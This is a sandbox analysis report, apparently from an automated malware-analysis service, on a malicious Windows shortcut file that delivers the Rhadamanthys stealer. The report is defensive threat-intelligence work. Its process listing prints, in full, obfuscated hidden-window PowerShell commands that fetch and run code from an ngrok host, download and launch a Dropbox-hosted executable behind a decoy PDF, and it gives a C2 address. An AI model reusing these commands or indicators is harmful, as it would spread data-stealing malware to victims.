Edit tour
Windows
Analysis Report
CNUXJvLcgw.lnk
Overview
General Information
Sample name: | CNUXJvLcgw.lnkrenamed because original name is a hash value |
Original sample name: | cafffe9031f22c7bc030a5d9876112308f4aad44d4547f1801db261fcbb4c404.lnk |
Analysis ID: | 1578256 |
MD5: | e461bcf2c24690059f65197769c5e4b6 |
SHA1: | c475fb6243d45594dde23c46e3c2ddef0a24d358 |
SHA256: | cafffe9031f22c7bc030a5d9876112308f4aad44d4547f1801db261fcbb4c404 |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 7456 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias aa7 765 curl ; sal av91c 3 iEx ; av 91c3(aa776 5 -Uri htt ps://23glc rtmzxqgwfp q3oujitt.n grok.pizza /api/secur e/7430a49b 4ec2f1c774 88485c5e23 d0dd -UseB asicParsin g) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7560 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias aa7765 curl ; sa l av91c3 i Ex ; av91c 3(aa7765 - Uri https: //23glcrtm zxqgwfpq3o ujitt.ngro k.pizza/ap i/secure/7 430a49b4ec 2f1c774884 85c5e23d0d d -UseBasi cParsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 7932 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/dgiur64v awmdx9alqw 6et/Lewis- Silkin-LLP .pdf?rlkey =kduhqrnp0 0rj44rjepp uw31qk&dl= 1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 1352 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 44 --field -trial-han dle=2076,i ,766181191 8937782434 ,100839333 1993226578 7,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - cmd.exe (PID: 8844 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user~1\A ppData\Loc al\Temp\18 87874022.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 9024 cmdline:
powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/d giur64vawm dx9alqw6et /Lewis-Sil kin-LLP.pd f?rlkey=kd uhqrnp00rj 44rjeppuw3 1qk&dl=1' -OutFile $ RandomPDF; Start-Pro cess -File Path 'msed ge.exe' -A rgumentLis t '--kiosk ', $Random PDF; Invok e-WebReque st -Uri 'h ttps://www .dropbox.c om/scl/fi/ uv9rtex94b i18x6hfwnv m/runner.e xe?rlkey=o hh5enlv6dy lr9jqxqwsf fkja&dl=1' -OutFile $RandomEXE ; Start-Pr ocess -Fil ePath $Ran domEXE; if (Test-Pat h $RandomE XE) { Invo ke-WebRequ est -Uri ' https://23 glcrtmzxqg wfpq3oujit t.ngrok.pi zza/metada ta/7430a49 b4ec2f1c77 488485c5e2 3d0dd'; }" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 7472 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user~1\App Data\Local \Temp\53cf 54c9-bd5a- 44a9-afff- e5edd73e8d 3d.pdf MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 6372 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=20 24 --field -trial-han dle=1720,i ,117462758 0293835826 3,16647309 4105087395 53,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F) - ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe (PID: 5696 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\ed1c a4d4-a6e3- 4b51-8ce0- 6f4ddefd62 ee.exe" MD5: F7A506F00E525E6D23AEE43D34219625) - ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe (PID: 7936 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\ed1c a4d4-a6e3- 4b51-8ce0- 6f4ddefd62 ee.exe" MD5: F7A506F00E525E6D23AEE43D34219625) - fontdrvhost.exe (PID: 8172 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 6372 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 7612 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 6 372 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 7912 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 7 936 -s 436 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 8072 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 1196 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/d giur64vawm dx9alqw6et /Lewis-Sil kin-LLP.pd f?rlkey=kd uhqrnp00rj 44rjeppuw3 1qk&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7468 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=27 56 --field -trial-han dle=2192,i ,460297362 565314636, 2208380792 323289799, 262144 /pr efetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8588 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 3584 --fie ld-trial-h andle=2192 ,i,4602973 6256531463 6,22083807 9232328979 9,262144 / prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8612 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6612 --field-t rial-handl e=2192,i,4 6029736256 5314636,22 0838079232 3289799,26 2144 /pref etch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8180 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=7692 --field-t rial-handl e=2192,i,4 6029736256 5314636,22 0838079232 3289799,26 2144 /pref etch:6 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8268 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=661 2 --field- trial-hand le=2192,i, 4602973625 65314636,2 2083807923 23289799,2 62144 /pre fetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |